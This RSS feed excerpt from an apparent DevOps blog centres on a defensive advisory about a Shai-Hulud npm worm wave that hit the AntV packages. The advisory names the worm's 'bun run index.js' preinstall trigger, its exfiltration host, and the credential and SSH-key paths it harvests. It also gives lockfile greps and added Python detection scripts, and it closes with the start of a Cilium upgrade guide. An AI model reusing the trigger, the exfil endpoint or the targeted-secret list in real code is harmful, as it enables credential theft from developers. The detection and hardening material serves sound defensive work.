<li>Terraform gets an &quot;AI plan summary&quot; feature from HashiCorp. It will explain what an apply will change in English. It will not write the apply for you. That is the right balance.</li>
<li>One major outage will be partially attributed to AI in its postmortem. It will become a case study. We will all learn from it.</li>
<li>The vendors will catch up. By mid-2027, the gap between &quot;what your custom 200-line script does&quot; and &quot;what your platform vendor ships&quot; will be much smaller than it is today.</li>
</ul>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        </h2><p>AI is reshaping DevOps. Not evenly. Code authoring and observability querying are the surfaces moving fastest. Infrastructure-as-code, secret management, and autonomous remediation are the surfaces moving slowest, for honest reasons. The big vendors are moving carefully because the downside of a wrong move is large; the individual engineers are moving fast because their downside is just an afternoon.</p>
<p>If you are in DevOps and you have not yet built an AI-shaped tool of your own into your workflow, this week is the right time. The bar to ship something useful has never been lower. The thing you build for yourself today is the thing your vendor will sell back to you in two years. Get ahead of it.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[AntV npm Compromise: The Shai-Hulud Worm Comes for Your Dashboards (May 19, 2026)]]></title>
      <link>https://devops-daily.com/posts/antv-npm-shai-hulud-wave-may-2026</link>
      <description><![CDATA[A new Shai-Hulud wave landed at 01:56 UTC on May 19 and rode the @antv maintainer account through 323 packages including echarts-for-react. Here is what got published, what it steals, and the lockfile grep that tells you if you are exposed.]]></description>
      <pubDate>Tue, 19 May 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/antv-npm-shai-hulud-wave-may-2026</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Supply Chain]]></category><category><![CDATA[npm]]></category><category><![CDATA[Security]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[CICD]]></category>
      <content:encoded><![CDATA[<p>A new wave of the Shai-Hulud worm hit npm at 01:56 UTC on May 19, 2026. This time the carrier was the <code>atool</code> maintainer account, which has publish rights across the AntV data-visualization ecosystem and a handful of downstream packages. Inside an hour the attacker pushed malicious versions of <code>@antv/g2</code>, <code>@antv/g6</code>, <code>@antv/x6</code>, <code>@antv/l7</code>, <code>@antv/s2</code>, <code>@antv/f2</code>, <code>@antv/g</code>, <code>@antv/g2plot</code>, <code>@antv/graphin</code>, <code>@antv/data-set</code>, plus the chart-glue libraries <code>echarts-for-react</code> (1.1M weekly downloads), <code>timeago.js</code>, <code>size-sensor</code>, and <code>canvas-nest.js</code>. Socket counted 639 compromised package versions across 323 unique packages in the burst, and 1,055 versions across 502 packages when you stack it on the broader campaign.</p>
<p>If your stack pulls any of these, even transitively, the payload runs at install time and exfiltrates whatever CI tokens, cloud credentials, and SSH keys the runner can see. This post is the short, practical version: what shipped, what it does, the one-liner grep that tells you if you are exposed, and the order to rotate secrets if you were.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        </h2><ul>
<li>New Shai-Hulud wave on May 19, 2026. Same worm family as the earlier TanStack and PyTorch Lightning incidents, different namespace and a fresh C2.</li>
<li>Compromised maintainer: <code>atool</code> on npm. AntV namespace plus <code>echarts-for-react</code>, <code>timeago.js</code>, <code>size-sensor</code>, <code>canvas-nest.js</code>, packages under <code>@lint-md/</code>, <code>@openclaw-cn/</code>, and <code>@starmind/</code>.</li>
<li>Trigger: <code>&quot;preinstall&quot;: &quot;bun run index.js&quot;</code> in the package.json. Runs the moment your CI installs.</li>
<li>Exfil destination: <code>t.m-kosche.com:443/api/public/otel/v1/traces</code> over HTTPS, AES-256-GCM payload with RSA-OAEP key wrapping. Looks like an OpenTelemetry traces submission.</li>
<li>Targets GitHub tokens, npm tokens, AWS keys, Kubernetes service-account tokens, Vault tokens, SSH keys, Docker auth files, database connection strings.</li>
<li>Creates a repository under the victim GitHub account named <code>&lt;dune-word&gt;-&lt;dune-word&gt;-&lt;digits&gt;</code> (e.g., <code>sayyadina-stillsuit-852</code>) and uploads stolen data as <code>results/results-&lt;timestamp&gt;-&lt;counter&gt;.json</code>. Marker string in commits: <code>niagA oG eW ereH :duluH-iahS</code>.</li>
<li>If your lockfile mentions any of the named packages with a version published between 01:56 and 02:56 UTC on May 19, treat the host that installed it as compromised and rotate everything in scope.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>A Node.js / npm / pnpm / Yarn / Bun project (or a CI pipeline that installs Node packages).</li>
<li>5 minutes to grep your lockfiles.</li>
<li>Access to rotate the credentials in your CI environment (npm tokens, GitHub Actions secrets, cloud IAM keys).</li>
</ul>
<h2 id="h2-what-changed-in-this-wave" class="group relative scroll-mt-24">
        <a href="#h2-what-changed-in-this-wave" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What changed in this wave
        </a>
        </h2><p>The Shai-Hulud worm has been hitting npm in waves since the late-2025 TanStack incident. The core loop has not changed: compromise a maintainer, publish malicious patch versions with a <code>preinstall</code> script, harvest credentials, use the stolen npm tokens to spread to packages the victim maintains. What is new in the May 19 wave:</p>
<ul>
<li><strong>Carrier:</strong> the <code>atool</code> account. This account has publish rights across the AntV ecosystem, which means a single account compromise unlocked 10+ heavily-used charting packages plus several React glue libraries. The TanStack wave moved through a single namespace; this one fans out wider.</li>
<li><strong>Transport:</strong> the worm now ships a <code>bun run index.js</code> preinstall script. Bun executes faster than Node and tolerates more permissive parsing, so the payload runs cleanly on Bun-installing runners (which is most modern Node CI). The earlier waves used <code>node</code> or <code>npm run</code>. If your CI has Bun preinstalled (the default on a lot of GitHub Actions images now), it executes without a separate runtime install step.</li>
<li><strong>Crypto:</strong> payload upgraded from raw HTTPS POSTs to AES-256-GCM body with RSA-OAEP wrapping. The traffic now blends into OpenTelemetry trace submissions to <code>t.m-kosche.com</code>, which dodges the simple <code>egress to known-bad domain</code> SOC rules unless you also fingerprint the request shape.</li>
<li><strong>Persistence:</strong> the worm creates a public repository under the victim&#39;s GitHub account, with a Dune-themed naming pattern, and stores exfiltrated data as a JSON file in <code>results/</code>. This is a backup channel in case the direct HTTPS exfil is blocked, and it is a public-internet-readable copy of your stolen secrets until you find and delete the repo.</li>
</ul>
<p>Once the preinstall hook fires, the behavior is otherwise the well-documented Shai-Hulud set: walk the file system for <code>.env</code>, <code>.npmrc</code>, <code>~/.aws/credentials</code>, <code>~/.docker/config.json</code>, <code>~/.kube/config</code>, SSH private keys, then walk environment variables for the usual CI tokens, then attempt to publish modified versions of any packages the stolen npm token can publish.</p>
<h2 id="h2-the-60-second-check-are-you-exposed" class="group relative scroll-mt-24">
        <a href="#h2-the-60-second-check-are-you-exposed" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The 60-second check: are you exposed
        </a>
        </h2><p>Run this in every repo. It greps across all the common lockfile formats:</p>
<pre><code class="hljs language-bash">grep -rE <span class="hljs-string">&quot;(@antv/|echarts-for-react|\&quot;timeago\.js\&quot;|\&quot;size-sensor\&quot;|\&quot;canvas-nest\.js\&quot;|@lint-md/|@openclaw-cn/|@starmind/)&quot;</span> \
  --include=<span class="hljs-string">&quot;package.json&quot;</span> \
  --include=<span class="hljs-string">&quot;package-lock.json&quot;</span> \
  --include=<span class="hljs-string">&quot;pnpm-lock.yaml&quot;</span> \
  --include=<span class="hljs-string">&quot;bun.lock&quot;</span> \
  --include=<span class="hljs-string">&quot;yarn.lock&quot;</span> \
  -l .
</code></pre><p>Zero matches: you are clear. Direct deps, transitive deps, and dev deps are all covered because they all end up resolved into the lockfile.</p>
<p>If you do hit a match, dig one level deeper to find the resolved version:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># For npm / pnpm / Bun lockfiles</span>
grep -A2 -E <span class="hljs-string">&quot;(@antv/|echarts-for-react)&quot;</span> package-lock.json pnpm-lock.yaml bun.lock 2&gt;/dev/null

<span class="hljs-comment"># For Yarn classic</span>
grep -A2 -E <span class="hljs-string">&quot;(@antv/|echarts-for-react)&quot;</span> yarn.lock
</code></pre><p>Any version published between <strong>2026-05-19 01:56 UTC and 02:56 UTC</strong> is the malicious window. Older versions are clean. Versions published after Socket and npm pulled the malicious ones (early May 19) are also clean. If you installed during the window, assume compromise.</p>
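<p>The greps above show that a named package is present but leave you reading lockfile context by eye. The following is an added example (not part of the original post or of any npm tooling) that walks a <code>package-lock.json</code> and reports every resolved copy of the packages named here, using the lockfile's <code>hasInstallScript</code> field; the sample lockfile and its version strings are constructed.</p>

```python
"""Report resolved copies of the packages named in this post from a package-lock.json."""
import json
import sys

# Package names and scopes exactly as listed in the post.
NAMED_PACKAGES = {"echarts-for-react", "timeago.js", "size-sensor", "canvas-nest.js"}
NAMED_SCOPES = ("@antv/", "@lint-md/", "@openclaw-cn/", "@starmind/")

# Constructed sample (lockfileVersion 3). Versions are placeholders, not real releases.
SAMPLE_LOCK = json.loads("""
{
  "name": "constructed-app",
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "constructed-app", "version": "1.0.0"},
    "node_modules/left-pad": {"version": "0.0.0-constructed"},
    "node_modules/@antv/g2": {"version": "0.0.1-constructed", "hasInstallScript": true},
    "node_modules/dashboard/node_modules/echarts-for-react": {"version": "0.0.2-constructed", "dev": true},
    "node_modules/timeago.js-fork": {"version": "0.0.3-constructed"},
    "node_modules/@antv/local-charts": {"resolved": "packages/charts", "link": true},
    "packages/charts": {"name": "@antv/local-charts", "version": "0.0.4-constructed"}
  }
}
""")


def package_name(lock_key):
    """'node_modules/a/node_modules/@antv/g2' becomes '@antv/g2'."""
    return lock_key.rsplit("node_modules/", 1)[-1]


def is_named(name):
    """Exact match on package names, prefix match on scopes."""
    return name in NAMED_PACKAGES or name.startswith(NAMED_SCOPES)


def _walk_v1(deps, trail=""):
    """lockfileVersion 1 nests copies under 'dependencies' and has no script flag."""
    for name, meta in deps.items():
        path = f"{trail}node_modules/{name}"
        yield path, dict(meta, name=name), False
        yield from _walk_v1(meta.get("dependencies", {}), path + "/")


def iter_entries(lock):
    """Yield (path, metadata, script_flag_recorded) for every installed package."""
    if "packages" in lock:  # lockfileVersion 2 and 3
        for key, meta in lock["packages"].items():
            # Skip the root entry, workspace source folders and workspace symlinks:
            # none of them are tarballs fetched from the registry.
            if "node_modules/" in key and not meta.get("link"):
                yield key, meta, True
    else:
        yield from _walk_v1(lock.get("dependencies", {}))


def audit_lockfile(lock):
    """Return one finding per resolved copy of a named package, script-bearing first."""
    findings = []
    for path, meta, recorded in iter_entries(lock):
        name = meta.get("name") or package_name(path)  # "name" is set for aliases
        if not is_named(name):
            continue
        findings.append({
            "name": name,
            "version": meta.get("version"),
            "path": path,
            "dev": bool(meta.get("dev")),
            # True/False when the lockfile records it, None when it cannot say.
            "has_install_script": bool(meta.get("hasInstallScript")) if recorded else None,
        })
    return sorted(findings, key=lambda f: (not f["has_install_script"], f["name"], f["path"]))


def main(argv):
    """Audit each lockfile path given, or the constructed sample when none is given."""
    locks = []
    for path in argv[1:]:
        with open(path, encoding="utf-8") as handle:
            locks.append((path, json.load(handle)))
    if not locks:
        locks.append(("constructed sample", SAMPLE_LOCK))
    labels = {True: "INSTALL-SCRIPT", False: "no-install-script", None: "script-flag-not-recorded"}
    hits = 0
    for label, lock in locks:
        for f in audit_lockfile(lock):
            hits += 1
            print(f"{label}: {f['name']}@{f['version']} [{labels[f['has_install_script']]}] {f['path']}")
    return 1 if hits else 0  # non-zero means "named package present", not "compromised"


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

<p>The lockfile does not record publish times, so take each reported version to the registry metadata (for example <code>npm view &lt;name&gt; time --json</code>) and compare its timestamp with the window above.</p>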
<h2 id="h2-if-you-were-exposed-rotation-order" class="group relative scroll-mt-24">
        <a href="#h2-if-you-were-exposed-rotation-order" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          If you were exposed: rotation order
        </a>
        </h2><p>The worm runs as the CI user, so the credentials it reaches are everything the CI runner had access to. Rotate in this order. The order matters because some tokens can re-grant access to others.</p>
<ol>
<li><strong>npm publish tokens</strong> first. If any package you maintain was on the CI runner&#39;s auth, the worm has already tried to use it. Rotate via <code>npm token revoke</code> and re-issue, then audit <code>npm token list</code> for unknown tokens.</li>
<li><strong>GitHub Actions <code>GITHUB_TOKEN</code> and personal access tokens.</strong> Revoke at <code>github.com/settings/tokens</code>. If the worm created a public repo under your account, find and delete it (search your repos for names matching <code>&lt;dune&gt;-&lt;dune&gt;-&lt;digits&gt;</code> or the marker string <code>niagA oG eW ereH :duluH-iahS</code>).</li>
<li><strong>Cloud IAM keys</strong>: AWS, GCP, Azure. The worm reads <code>~/.aws/credentials</code>, <code>AWS_ACCESS_KEY_ID</code>, <code>AWS_SECRET_ACCESS_KEY</code>. Rotate via the cloud console; do not just edit the env var.</li>
<li><strong>Kubernetes service-account tokens.</strong> If the runner had a <code>KUBECONFIG</code>, that token can pull secrets from the cluster. Rotate the service account.</li>
<li><strong>Vault tokens.</strong> <code>VAULT_TOKEN</code> is in the targeted list. Revoke the token and review the audit log for its recent use.</li>
<li><strong>SSH keys.</strong> The worm copies <code>~/.ssh/id_*</code> private keys. Rotate any key the CI runner had access to (deploy keys, signing keys).</li>
<li><strong>Anything in <code>.env</code> files on disk.</strong> If they were on the runner, they are gone. Rotate every credential listed.</li>
</ol>
<p>After rotation, audit GitHub for new repos under your org, npm for new versions on packages you own, and cloud logs for unusual API calls from unknown IPs in the past 24 hours.</p>
<h2 id="h2-indicators-of-compromise-to-feed-your-soc" class="group relative scroll-mt-24">
        <a href="#h2-indicators-of-compromise-to-feed-your-soc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Indicators of compromise to feed your SOC
        </a>
        </h2><p>Network egress to any of these is a red flag for the May 19 wave:</p>
<pre><code class="hljs language-text">t.m-kosche.com                 (primary C2, HTTPS port 443)
fulcio.sigstore.dev            (secondary endpoint, abuses sigstore)
rekor.sigstore.dev             (secondary endpoint, abuses sigstore)
</code></pre><p>The sigstore endpoints are legitimate services, which makes pure-domain alerting noisy. Pair the egress alert with the source: if a CI runner that normally does not touch sigstore suddenly POSTs there during a Node install, that is the pattern.</p>
<p>File-system markers on a runner that ran the payload:</p>
<pre><code class="hljs language-text">~/.cache/npm/_logs/                    (preinstall script left logs here)
/tmp/results-&lt;timestamp&gt;-&lt;counter&gt;.json  (staged exfil before HTTPS POST)
</code></pre><p>GitHub-side markers on the victim account:</p>
<pre><code class="hljs language-text">A new public repo named &lt;dune-word&gt;-&lt;dune-word&gt;-&lt;digits&gt;
  e.g. sayyadina-stillsuit-852, paul-fremen-1213, gurney-crysknife-49
Commit body containing: niagA oG eW ereH :duluH-iahS
File path: results/results-&lt;timestamp&gt;-&lt;counter&gt;.json
</code></pre><p>The Dune reference is the worm author&#39;s signature across waves. The reversed string decodes to <code>Shai-Hulud: Here We Go Again</code>. It is consistent enough that you can search your org-wide GitHub event log for it.</p>
<h2 id="h2-preventing-the-next-wave" class="group relative scroll-mt-24">
        <a href="#h2-preventing-the-next-wave" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Preventing the next wave
        </a>
        </h2><p>This is the third Shai-Hulud wave in roughly six months. There is going to be a fourth. Defenses that actually move the needle:</p>
<ul>
<li><strong>Pin npm dependencies with <code>--save-exact</code></strong> and resolve transitives through a single lockfile per repo. Caret-pinning (<code>^1.2.3</code>) is what gets you auto-installed into the malicious window. Exact pins force a human to bump.</li>
<li><strong>Disable <code>preinstall</code> and <code>postinstall</code> scripts in CI</strong> with <code>npm config set ignore-scripts true</code> (or <code>--ignore-scripts</code> on the install command, or <code>enableScripts: false</code> in <code>.yarnrc.yml</code>). This breaks some legitimate packages that need a native build step, but those are usually a known short list you can opt back in for. The default should be off.</li>
<li><strong>Run installs in an ephemeral runner with no production credentials in env.</strong> GitHub Actions composite jobs make this practical: one job does <code>npm ci --ignore-scripts</code> against a hermetic cache, the next stage does the build, only the deploy stage has the real secrets. If a malicious preinstall fires, it sees nothing worth exfiltrating.</li>
<li><strong>Egress allowlist on CI runners.</strong> The default GitHub Actions runner can talk to the entire internet. An egress allowlist of registry.npmjs.org, github.com, your registry, and your deploy targets kills almost every supply-chain payload. Tools like Sysdig&#39;s egress policies, Step Security&#39;s harden-runner action, or a simple iptables rule in your self-hosted runner image all do this.</li>
<li><strong>npm token scoping.</strong> Use <code>--scope</code> and granular permissions. A token that can only publish <code>@your-org/foo</code> cannot be used by a worm to publish <code>@your-org/bar</code>. Audit <code>npm token list</code> regularly and prune.</li>
<li><strong>Watch for new repos under your org and your maintainer accounts.</strong> A Shai-Hulud-style worm cannot hide the repo it creates. A simple cron that diffs <code>gh repo list</code> against a known list will catch it within an hour.</li>
</ul>
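<p>The repo-name shape and commit marker from the IoC section, combined with the baseline diff suggested in the last bullet, as an added example (not from the original post). It expects records shaped like <code>gh repo list --json name,visibility,createdAt</code> output; the optional <code>commit_messages</code> field, the baseline and all sample records are assumptions constructed for the example.</p>

```python
"""Diff a repo-list snapshot against a known baseline and rank what is new."""
import json
import re
import sys

# Shape given in the post: word-word-digits, e.g. sayyadina-stillsuit-852.
# The post does not publish the word list, so only the shape is matched (assumption).
WORM_NAME = re.compile(r"^[a-z]+-[a-z]+-\d+$")

# Marker string from the post. It is stored reversed; MARKER[::-1] is the readable form.
MARKER = "niagA oG eW ereH :duluH-iahS"

# Constructed inputs. "commit_messages" is a hypothetical field you would fill from a
# separate commit lookup; `gh repo list` does not return it.
BASELINE = {"api-gateway"}
SAMPLE_REPOS = [
    {"name": "api-gateway", "visibility": "PRIVATE", "createdAt": "2025-01-10T09:00:00Z"},
    {"name": "sayyadina-stillsuit-852", "visibility": "PUBLIC", "createdAt": "2026-05-19T02:10:00Z"},
    {"name": "design-tokens", "visibility": "PUBLIC", "createdAt": "2026-05-18T14:00:00Z"},
    {"name": "load-test-2", "visibility": "PRIVATE", "createdAt": "2026-05-17T08:00:00Z"},
    {"name": "scratch", "visibility": "PUBLIC", "createdAt": "2026-05-19T02:30:00Z",
     "commit_messages": ["init", MARKER]},
]


def has_marker(messages):
    """True if any commit message carries the marker, stored or readable form."""
    return any(MARKER in m or MARKER[::-1] in m for m in messages)


def triage_repos(current, baseline_names):
    """Return repos missing from the baseline, highest severity first."""
    findings = []
    for repo in current:
        if repo["name"] in baseline_names:
            continue
        reasons = ["not-in-baseline"]
        shape = bool(WORM_NAME.match(repo["name"]))
        public = repo.get("visibility", "").upper() == "PUBLIC"
        marker = has_marker(repo.get("commit_messages", []))
        if shape:
            reasons.append("name-shape")
        if public:
            reasons.append("public")
        if marker:
            reasons.append("commit-marker")
        # The post describes a public repo with this name shape; the marker alone is
        # also decisive. Everything else new still needs a human look.
        severity = "high" if marker or (shape and public) else "review"
        findings.append({"name": repo["name"], "created_at": repo.get("createdAt"),
                         "severity": severity, "reasons": reasons})
    return sorted(findings, key=lambda f: (f["severity"] != "high", f["name"]))


def main(argv):
    """argv[1]: JSON file of repo records, argv[2]: baseline file, one name per line."""
    if len(argv) == 3:
        with open(argv[1], encoding="utf-8") as handle:
            current = json.load(handle)
        with open(argv[2], encoding="utf-8") as handle:
            baseline = {line.strip() for line in handle if line.strip()}
    else:
        current, baseline = SAMPLE_REPOS, BASELINE
    findings = triage_repos(current, baseline)
    for f in findings:
        print(f"{f['severity'].upper():6} {f['name']} created={f['created_at']} {','.join(f['reasons'])}")
    return 2 if any(f["severity"] == "high" for f in findings) else (1 if findings else 0)


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

<p>Shape-only matching will also flag ordinary names such as <code>load-test-2</code>, which is why the baseline diff, not the regex, decides what gets reported.</p>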
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        </h2><p>A new Shai-Hulud wave landed on npm at 01:56 UTC on May 19, 2026 through the compromised <code>atool</code> maintainer account. It published malicious patch versions of the entire AntV data-viz namespace plus <code>echarts-for-react</code>, <code>timeago.js</code>, <code>size-sensor</code>, <code>canvas-nest.js</code>, and a handful of <code>@lint-md</code>, <code>@openclaw-cn</code>, <code>@starmind</code> packages. The payload runs at install time via a <code>bun run index.js</code> preinstall hook, harvests cloud and CI credentials, exfiltrates them to <code>t.m-kosche.com</code> disguised as OpenTelemetry traces, and creates a public GitHub repo to stash a backup copy.</p>
<p>Run the grep above against every lockfile in your stack right now. If you have a match in the malicious window, rotate npm publish tokens first, then GitHub tokens, then cloud IAM, then service-account tokens, then SSH keys. After that, harden CI with <code>--ignore-scripts</code>, exact pins, and an egress allowlist so the next wave does not get the same easy ride.</p>
<h2 id="h2-source" class="group relative scroll-mt-24">
        <a href="#h2-source" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Source
        </a>
        </h2><p>Socket&#39;s running disclosure: <a href="https://socket.dev/blog/antv-packages-compromised"><code>socket.dev/blog/antv-packages-compromised</code></a>. The page is updated as the investigation continues.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Cilium 1.19 ClusterMesh Policy Flip: The Silent Default That Will Drop Your Cross-Cluster Traffic]]></title>
      <link>https://devops-daily.com/posts/cilium-1-19-clustermesh-policy-flip</link>
      <description><![CDATA[Cilium 1.19 changed how network policies without a cluster selector resolve in a ClusterMesh. East/West traffic that 1.18 implicitly allowed is now silently dropped. Here is how to find every affected policy before you upgrade.]]></description>
      <pubDate>Mon, 18 May 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/cilium-1-19-clustermesh-policy-flip</guid>
      <category><![CDATA[Kubernetes]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Kubernetes]]></category><category><![CDATA[Cilium]]></category><category><![CDATA[ClusterMesh]]></category><category><![CDATA[Network Policy]]></category><category><![CDATA[eBPF]]></category><category><![CDATA[Networking]]></category>
      <content:encoded><![CDATA[<p>The Cilium 1.19 changelog is long. Most of it is fine. One line tucked in the upgrade guide will quietly break ClusterMesh deployments that did not prepare for it: the policy-default-local-cluster flag is now on by default. Network policies that used to implicitly match endpoints across every connected cluster now match only the local cluster. East/West traffic that worked yesterday gets dropped today, with nothing in the policy you wrote to explain why.</p>
<p>This post is the pre-upgrade walkthrough. What changed, what concretely breaks, the <code>cilium clustermesh inspect-policy-default-local-cluster</code> command that lists every affected policy on your live 1.18 cluster, and the safe order to roll the upgrade. There is also a side-section on the new strict-encryption knobs in 1.19, since those are easy to misread as a default flip too.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        </h2><ul>
<li><strong>The silent break:</strong> <code>policy-default-local-cluster</code> defaults to <code>true</code> in 1.19. CiliumNetworkPolicies without an explicit <code>io.cilium.k8s.policy.cluster</code> selector now match only local-cluster endpoints. Implicit cross-cluster matches stop working.</li>
<li><strong>The fix is a pre-upgrade audit, not a code change.</strong> Run <code>cilium clustermesh inspect-policy-default-local-cluster --all-namespaces</code> on the 1.18 cluster. Treat the output as your migration TODO.</li>
<li><strong>The escape hatch:</strong> set <code>clustermesh.policyDefaultLocalCluster: false</code> in Helm during the upgrade window to keep 1.18 semantics while you migrate.</li>
<li><strong>Encryption strict mode is opt-in, not flipped.</strong> 1.19 adds a new ingress strict mode and renames the old egress keys. If your <code>values.yaml</code> still uses <code>encryption.strictMode.enabled</code>, that is now <code>encryption.strictMode.egress.enabled</code>. The deprecation warning today becomes a removal in 1.20.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>A Cilium ClusterMesh between two or more Kubernetes clusters, currently on 1.18.x.</li>
<li>Cluster-admin RBAC on each cluster.</li>
<li><code>cilium</code> CLI v0.16+ installed locally (the inspect command landed alongside the 1.19 release).</li>
<li>Hubble running. If you don&#39;t run Hubble in production, this upgrade is a good reason to start; the validation steps below depend on it.</li>
</ul>
<h2 id="h2-what-actually-changed-in-119" class="group relative scroll-mt-24">
        <a href="#h2-what-actually-changed-in-119" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What actually changed in 1.19
        </a>
        </h2><p>Two unrelated things people are conflating. Take them one at a time.</p>
<h3 id="h3-1-clustermesh-policy-default-the-silent-break-one" class="group relative scroll-mt-24">
        <a href="#h3-1-clustermesh-policy-default-the-silent-break-one" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          1. ClusterMesh policy default (the silent-break one)
        </a>
        </h3><p>From the 1.19 upgrade guide:</p>
<blockquote>
<p>Cilium network policies used to implicitly select endpoints from all the clusters. Cilium 1.18 introduced a new option called <code>policy-default-local-cluster</code> which will be set by default in Cilium 1.19.</p>
</blockquote>
<p>And from the 1.19.0 release notes:</p>
<blockquote>
<p>When network policy selectors don&#39;t explicitly define a cluster for communication to be allowed, they will now default to only allowing the local cluster.</p>
</blockquote>
<p>The mechanic: before 1.19, a <code>fromEndpoints</code> selector like</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">fromEndpoints:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
</code></pre><p>matched every pod labelled <code>app: web</code> in every cluster in the mesh. After 1.19 (with the default), it matches only pods in the local cluster. To preserve the old semantics you have to be explicit:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">fromEndpoints:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
      <span class="hljs-attr">io.cilium.k8s.policy.cluster:</span> <span class="hljs-string">&quot;*&quot;</span>     <span class="hljs-comment"># all clusters in the mesh</span>
<span class="hljs-comment"># or</span>
<span class="hljs-attr">fromEndpoints:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
      <span class="hljs-attr">io.cilium.k8s.policy.cluster:</span> <span class="hljs-string">cluster-east</span>
</code></pre><p>This change is a security improvement. Implicit cross-cluster trust was a frequent source of &quot;we didn&#39;t realize that policy reached the staging cluster.&quot; But for clusters that intentionally relied on it for legitimate East/West traffic, the upgrade silently severs the path. See PR <code>cilium/cilium#40609</code>.</p>
<h3 id="h3-2-encryption-strict-modes-new-knobs-not-a-default-flip" class="group relative scroll-mt-24">
        <a href="#h3-2-encryption-strict-modes-new-knobs-not-a-default-flip" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          2. Encryption strict modes (new knobs, not a default flip)
        </a>
        </h3><p>The release-note line that has been getting misread:</p>
<blockquote>
<p>Encryption Strict Modes: Both IPsec and WireGuard transparent encryption modes now support a &quot;strict mode&quot; to require traffic to be encrypted between nodes. Unencrypted traffic will be dropped in this mode.</p>
</blockquote>
<p>There are three actual changes here, none of which is turned on by default:</p>
<ol>
<li>A new <strong>ingress</strong> strict mode was added. Previous releases only had an egress strict mode. Flag: <code>--enable-encryption-strict-mode-ingress</code>. Helm: <code>encryption.strictMode.ingress.enabled</code>.</li>
<li>IPsec strict mode was generalized from WireGuard, so the same strict-mode semantics now exist for both transports. PR <code>#42115</code>.</li>
<li>The pre-existing egress strict-mode Helm keys were <strong>renamed</strong>. <code>encryption.strictMode.enabled</code> is deprecated in favor of <code>encryption.strictMode.egress.enabled</code>. The old keys still work in 1.19 with a warning. They are scheduled for removal in 1.20.</li>
</ol>
<p>If you are not running strict mode today, this section does not change anything for you on upgrade. If you are, you have a <code>values.yaml</code> rename to do. Either way, do not enable strict ingress and the ClusterMesh policy migration in the same change window.</p>
<h2 id="h2-what-concretely-breaks-on-a-naive-helm-upgrade" class="group relative scroll-mt-24">
        <a href="#h2-what-concretely-breaks-on-a-naive-helm-upgrade" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What concretely breaks on a naive helm upgrade
        </a>
        </h2><table>
<thead>
<tr>
<th>Surface</th>
<th>Behavior post-upgrade</th>
</tr>
</thead>
<tbody><tr>
<td>ClusterMesh East/West traffic with implicit selectors</td>
<td>Dropped at policy enforcement. Hubble shows <code>verdict: DROPPED, type: policy-verdict</code>.</td>
</tr>
<tr>
<td>Existing strict-mode encryption with old Helm keys</td>
<td>Still works, emits deprecation warning. Will break on 1.20.</td>
</tr>
<tr>
<td>Mutual Authentication</td>
<td>Now disabled by default. Re-enable explicitly if you depend on it.</td>
</tr>
<tr>
<td><code>CiliumBGPPeeringPolicy</code> v1 API</td>
<td>Removed. Migrate to <code>cilium.io/v2</code> before upgrading.</td>
</tr>
<tr>
<td>Kafka L7 policy, <code>ToRequires</code>, <code>FromRequires</code></td>
<td>Deprecated. Surfaces as warnings, no behavior change yet.</td>
</tr>
<tr>
<td>Host-network pods</td>
<td>Unchanged, unless you also enable ingress strict mode.</td>
</tr>
</tbody></table>
